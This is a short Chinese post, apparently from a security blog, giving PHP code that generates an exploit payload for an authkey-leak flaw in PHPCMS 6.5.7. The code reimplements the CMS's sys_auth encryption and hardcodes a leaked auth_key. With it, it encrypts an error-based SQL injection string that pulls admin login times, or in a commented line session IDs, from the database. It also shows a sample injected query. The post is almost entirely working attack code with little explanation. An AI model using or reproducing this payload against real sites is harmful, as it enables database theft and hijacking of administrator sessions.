PHPCMS某处设计缺陷可致authkey泄露 【针对6.5.7版本的payload生成代码】
11
<?php /** * 字符串加密、解密函数 * * * @param string $txt 字符串 * @param string $operation ENCODE为加密,DECODE为解密,可选参数,默认为ENCODE, * @param string $key 密钥:数字、字母、下划线 * @param string $expiry 过期时间 * @return string */ function sys_auth($string, $operation = 'ENCODE', $key = '', $expiry = 0) { $key_length = 4; // echo "auth"; // echo pc_base::load_config('system', 'auth_key'); // echo "auth end"; $key = md5($key != '' ? $key : ""); $fixedkey = md5($key); $egiskeys = md5(substr($fixedkey, 16, 16)); $runtokey = $key_length ? ($operation == 'ENCODE' ? substr(md5(microtime(true)), -$key_length) : substr($string, 0, $key_length)) : ''; $keys = md5(substr($runtokey, 0, 16) . substr($fixedkey, 0, 16) . substr($runtokey, 16) . substr($fixedkey, 16)); $string = $operation == 'ENCODE' ? sprintf('%010d', $expiry ? $expiry + time() : 0).substr(md5($string.$egiskeys), 0, 16) . $string : base64_decode(substr($string, $key_length)); $i = 0; $result = ''; $string_length = strlen($string); for ($i = 0; $i < $string_length; $i++){ $result .= chr(ord($string{$i}) ^ ord($keys{$i % 32})); } if($operation == 'ENCODE') { return $runtokey . str_replace('=', '', base64_encode($result)); } else { if((substr($result, 0, 10) == 0 || substr($result, 0, 10) - time() > 0) && substr($result, 10, 16) == substr(md5(substr($result, 26).$egiskeys), 0, 16)) { return substr($result, 26); } else { return ''; } } } #XNvNxVxghgMEoNNq9MiUMozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0 $auth_key = "XNvNxVxghgMEoNNq9MiU"; $ua = "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0"; function get_auth_key() { global $auth_key; global $ua; $pc_auth_key = md5($auth_key.$ua); return $pc_auth_key; } $auth_key2 = get_auth_key(""); $sql = "1' and (extractvalue(1,concat(0x7e,(select lastlogintime from v9_admin limit 0,1))));#\txx"; #$sql = "1' and (extractvalue(1,concat(0x7e,(select sessionid from v9_session limit 1,1))));#\tokee"; #echo $auth_key2; $sec1 = sys_auth($sql,"ENCODE",$auth_key2); #echo $sec1; #echo "\n"; echo sys_auth($sec1,"ENCODE",$auth_key);
//报错代码:
SELECT * FROM `tianyu`.`v9_member` WHERE `userid` = '1' and (extractvalue(1,concat(0x7e,(select user()))));#' LIMIT 1
参考:http://0day5.com/archives/3251/
22
天道酬勤